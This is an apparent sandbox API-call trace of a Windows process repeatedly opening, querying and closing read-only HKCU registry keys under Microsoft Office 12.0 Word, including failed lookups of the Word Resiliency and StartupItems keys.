[0086.196] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x42c) returned 0x0
[0086.196] RegCloseKey (hKey=0x42c) returned 0x0
[0086.196] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x42c) returned 0x0
[0086.196] RegCloseKey (hKey=0x42c) returned 0x0
[0086.196] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x42c) returned 0x0
[0086.196] RegCloseKey (hKey=0x42c) returned 0x0
[0086.196] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x42c) returned 0x0
[0086.196] RegCloseKey (hKey=0x42c) returned 0x0
[0086.196] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x42c) returned 0x0
[0086.196] RegCloseKey (hKey=0x42c) returned 0x0
[0086.196] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8e8 | out: phkResult=0x1c81c8e8*=0x42c) returned 0x0
[0086.196] RegCloseKey (hKey=0x42c) returned 0x0
[0086.196] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x42c) returned 0x0
[0086.197] RegCloseKey (hKey=0x42c) returned 0x0
[0086.197] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c828 | out: phkResult=0x1c81c828*=0x42c) returned 0x0
[0086.197] RegCloseKey (hKey=0x42c) returned 0x0
[0086.197] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x0) returned 0x2
[0086.197] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c5fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.197] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x42c) returned 0x0
[0086.197] RegQueryInfoKeyW (in: hKey=0x42c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c5fc*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.197] RegOpenKeyExW (in: hKey=0x42c, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x430) returned 0x0
[0086.197] RegCloseKey (hKey=0x42c) returned 0x0
[0086.197] RegQueryInfoKeyW (in: hKey=0x430, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c5fc*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.197] RegOpenKeyExW (in: hKey=0x430, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x42c) returned 0x0
[0086.198] RegCloseKey (hKey=0x430) returned 0x0
[0086.198] RegQueryInfoKeyW (in: hKey=0x42c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c5fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.198] RegOpenKeyExW (in: hKey=0x42c, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x430) returned 0x0
[0086.198] RegCloseKey (hKey=0x42c) returned 0x0
[0086.198] RegQueryInfoKeyW (in: hKey=0x430, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c5fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.198] RegOpenKeyExW (in: hKey=0x430, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x42c) returned 0x0
[0086.198] RegCloseKey (hKey=0x430) returned 0x0
[0086.198] RegQueryInfoKeyW (in: hKey=0x42c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c5fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.198] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x0) returned 0x2
[0086.198] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c6dc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.198] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x430) returned 0x0
[0086.198] RegQueryInfoKeyW (in: hKey=0x430, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c6dc*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.198] RegOpenKeyExW (in: hKey=0x430, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x434) returned 0x0
[0086.198] RegCloseKey (hKey=0x430) returned 0x0
[0086.198] RegQueryInfoKeyW (in: hKey=0x434, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c6dc*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.198] RegOpenKeyExW (in: hKey=0x434, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x430) returned 0x0
[0086.199] RegCloseKey (hKey=0x434) returned 0x0
[0086.199] RegQueryInfoKeyW (in: hKey=0x430, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c6dc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.199] RegOpenKeyExW (in: hKey=0x430, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x434) returned 0x0
[0086.199] RegCloseKey (hKey=0x430) returned 0x0
[0086.199] RegQueryInfoKeyW (in: hKey=0x434, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c6dc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.248] RegOpenKeyExW (in: hKey=0x434, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x3ec) returned 0x0
[0086.248] RegCloseKey (hKey=0x434) returned 0x0
[0086.248] RegQueryInfoKeyW (in: hKey=0x3ec, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c6dc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.248] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x0) returned 0x2
[0086.248] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c6dc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.248] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x0) returned 0x2
[0086.248] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c5fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.248] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x434) returned 0x0
[0086.248] RegQueryInfoKeyW (in: hKey=0x434, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c5fc*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.248] RegOpenKeyExW (in: hKey=0x434, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x310) returned 0x0
[0086.248] RegCloseKey (hKey=0x434) returned 0x0
[0086.248] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c5fc*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.249] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x434) returned 0x0
[0086.249] RegCloseKey (hKey=0x310) returned 0x0
[0086.249] RegQueryInfoKeyW (in: hKey=0x434, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c5fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.249] RegOpenKeyExW (in: hKey=0x434, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x310) returned 0x0
[0086.249] RegCloseKey (hKey=0x434) returned 0x0
[0086.249] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c5fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.249] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x434) returned 0x0
[0086.249] RegCloseKey (hKey=0x310) returned 0x0
[0086.249] RegQueryInfoKeyW (in: hKey=0x434, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c5fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c5f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.249] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x0) returned 0x2
[0086.249] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c6dc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.249] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x310) returned 0x0
[0086.249] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c6dc*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.249] RegOpenKeyExW (in: hKey=0x310, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x3f0) returned 0x0
[0086.249] RegCloseKey (hKey=0x310) returned 0x0
[0086.250] RegQueryInfoKeyW (in: hKey=0x3f0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c6dc*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.250] RegOpenKeyExW (in: hKey=0x3f0, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x310) returned 0x0
[0086.250] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.250] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c6dc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.250] RegOpenKeyExW (in: hKey=0x310, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x3f0) returned 0x0
[0086.250] RegCloseKey (hKey=0x310) returned 0x0
[0086.250] RegQueryInfoKeyW (in: hKey=0x3f0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c6dc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.250] RegOpenKeyExW (in: hKey=0x3f0, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x310) returned 0x0
[0086.250] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.250] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c6dc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.250] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x0) returned 0x2
[0086.250] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c6dc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c6d8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.250] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6d8 | out: phkResult=0x1c81c6d8*=0x3f0) returned 0x0
[0086.250] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.251] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6f8 | out: phkResult=0x1c81c6f8*=0x3f0) returned 0x0
[0086.251] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.251] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c6f8 | out: phkResult=0x1c81c6f8*=0x3f0) returned 0x0
[0086.251] RegCloseKey (hKey=0x3f0) returned 0x0
[0086.251] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7b8 | out: phkResult=0x1c81c7b8*=0x3f0) returned 0x0
[0086.251] RegCloseKey (hKey=0x3f0) returned 0x0
